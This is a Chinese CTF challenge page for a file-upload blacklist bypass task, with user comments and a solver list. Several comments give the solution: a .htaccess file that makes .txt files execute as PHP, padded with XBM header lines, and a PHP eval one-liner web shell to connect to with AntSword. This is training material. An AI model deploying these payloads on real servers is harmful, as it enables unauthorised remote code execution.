Upload 2WEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: Max_yiz
一血奖励: 0金币
解  决: 123
提  示:
描  述:
We used a blacklist now ... can you **access** the flag now?\n\n\n\ \ **Author**: souad
评论
toxi 2月前

只需要把文件后缀的.php换成.php5即可

回复 0

啊这这 2月前

题目非常好 不过我有个疑问 为什么我上传的shell木马中的提交参数函数必须是REQUEST还要是大写 我尝试了GET POST都不行 大写是语法只能是大写还是其他原因吗

回复 1
xiaoxiao972521 1月前

可以吧,$_GET $_REQUEST 都行,这些属于php函数,就是这个写法

回复 0

我不知丢答案 2月前

为什么我上传.user.ini文件去连的时候连不上??

回复 0

JJhello 5月前

接下面,内容为一句话木马,然后蚁剑连shell.txt的路径即可

回复 0

JJhello 5月前

上传一个文件名为 ".htaccess",注意,文件名前面没有任何东西的,文件内容为: #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 然后上传shell.txt,内容为

回复 0

samRsa 6月前

1、bp抓包上传.htaccess #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 2、上传马 GIF89a <?php @eval($_POST['cmd']); ?>

回复 0

PandaCattle 7月前

看了官方wp就知道有多离谱。。https://github.com/Shellmates/HackINI-2k23-public/blob/main/web/upload-2/solve/README.md

回复 0

hopeinhand 8月前

后缀php不行,换后缀php5发现容器只允许.php后缀执行命令,使用.htaccess绕过

回复 0
PandaCattle 7月前

@jiangbw 做出来了,只能说逆天,.htaccess内容里面必须有#define width 16 #define height 7

回复 0

PandaCattle 7月前

@jiangbw 我也一样 直接报错了 是不是环境有问题

回复 0

jiangbw 8月前

@niano.0 .htaccess上传完就跳界面了,那怎么绕过啊

回复 0

niano.0 8月前

@xjc7580 大佬,怎么做的呀

回复 0

xjc7580 8月前

大佬,再给点提示呗,上传.htaccess与上传的shell不一个目录啊

回复 1

WriteUp

image
lolthis223

1 金币

评分(2)

解题动态

xiuliyeer1 攻破了该题 12小时前
18993258097 攻破了该题 13小时前
gleason 攻破了该题 6天前
菜狗打比赛 攻破了该题 7天前
to5ny 攻破了该题 7天前
fducgc 攻破了该题 8天前
qwerfsafafa 攻破了该题 8天前
skyorangezxc 攻破了该题 12天前
lq61618 攻破了该题 18天前
flying5941 攻破了该题 19天前
1512624649 攻破了该题 23天前
15346899030 攻破了该题 24天前
ha33 攻破了该题 24天前
15518210955 攻破了该题 25天前
网络小钦 攻破了该题 26天前
macleo 攻破了该题 27天前
Zt0312 攻破了该题 1月前
cqy123 攻破了该题 1月前
网咯小白 攻破了该题 1月前
2229242816 攻破了该题 1月前